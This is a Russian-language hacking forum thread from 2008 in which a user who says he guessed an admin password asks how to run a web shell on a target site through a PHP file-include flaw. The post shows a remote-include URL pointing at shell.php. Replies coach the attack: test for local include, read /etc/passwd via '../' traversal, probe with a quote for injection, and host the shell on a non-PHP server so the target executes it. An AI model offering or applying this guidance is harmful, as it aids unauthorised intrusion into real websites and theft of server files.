PHP includ Как выполнить шелл?

Discussion in 'Песочница' started by Nicca, 14 Jan 2008.

  1. Nicca

    Nicca Elder - Старейшина

    Joined:
    11 Jan 2008
    Messages:
    93
    Likes Received:
    4
    Reputations:
    -6
    Подскажите как залить шел:
    Подобрал пароль к админке. Там есть приблизительно такой вызов скрипта:
    http://www.hacksite.com/index.php?id?page=user024.php

    Я сделал так:
    http://www.hacksite.com/index.php?id&page=http://www.site.com/shell.php

    Как теперь сделать чтобы у меня был доступ к файлам атакуемого сервера? А то я вижу только свой сервер, свои файлы?
     
  2. xXvladXx

    xXvladXx Elder - Старейшина

    Joined:
    28 Oct 2007
    Messages:
    77
    Likes Received:
    54
    Reputations:
    5
    если так не получилось может быть это локальный инклюд... попробуй залить шелл и потом его про инклюдить...
     
  3. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    xXvladXx бред, читай что тс написал

    Nicca на каком хосте находится твой шелл.. это раз, второе - не в фрейме опенится ссыль?
     
  4. FraiDex

    FraiDex Elder - Старейшина

    Joined:
    16 Jun 2006
    Messages:
    193
    Likes Received:
    68
    Reputations:
    -11
    чел, ты хоть сам понял что написал? если ты зальёшь шелл, нахрена его потом инклудить?
     
    #4 FraiDex, 15 Jan 2008
    Last edited: 15 Jan 2008
  5. Nicca

    Nicca Elder - Старейшина

    Joined:
    11 Jan 2008
    Messages:
    93
    Likes Received:
    4
    Reputations:
    -6
    1. .freehostia.com

    2.Опенится во фрейме!
     
  6. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    если ты зальешь шелл просто как файл /*без права на исполнение: картинка, видео, текст.. а потом локально инклюдить*/

    но у тс скорее всего просто ифрейм.. /*судя по тому, что он видит файлы того сервера, где залит шелл*/
    тс, попробуй проинклюдить /еtc/passwd или что-то другое не доступное через ифрейм

    *добавлено

    если ифрем, то это не инклуд))) ищи другие баги или попробуй через заливку /*картинок, банеров, темплейтов и других фалов*/, попробуй редактирование страниц, тепмлейтов
     
    _________________________
    #6 halkfild, 15 Jan 2008
    Last edited: 15 Jan 2008
  7. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    если во фрейме, то ничего не поделаешь. скорее всего просто открывается

    <frame src="http://shell.com/shell.php">
     
  8. Nicca

    Nicca Elder - Старейшина

    Joined:
    11 Jan 2008
    Messages:
    93
    Likes Received:
    4
    Reputations:
    -6
    Как исккать /еtc/passwd?
    к UsrPage= Добавлять ../etc/passwd ?
    Как я тогда его увижу? Сдесь не выводятся\ сообщения об ошибках пробовал:
    UsrPage= .sfsd.f2r2 выводит страницу по дефолту. Ошибки нет.
    Если я наткнусь на /etc/passwd то выведит ли мне его на страницу?
     
  9. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    да вожможно у него там даже нет ни какого инклуда попробуй подставить ковычку после http://www.hacksite.com/index.php?id&page=' и посмотри что у тебя получится
     
  10. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    Не факт что во там именно ифрейм
    http://freehostia.com/free_hosting.html
    Смотрим сюда и видим PHP Enabled
    Это значит что шелл выполняется на blabla.freehostia.com и уже выводится на уязвимом сайте
    ТС, залей шелл на хостинг без PHP (narod.ru к примеру) и пробуй его проинклудить
     
    1 person likes this.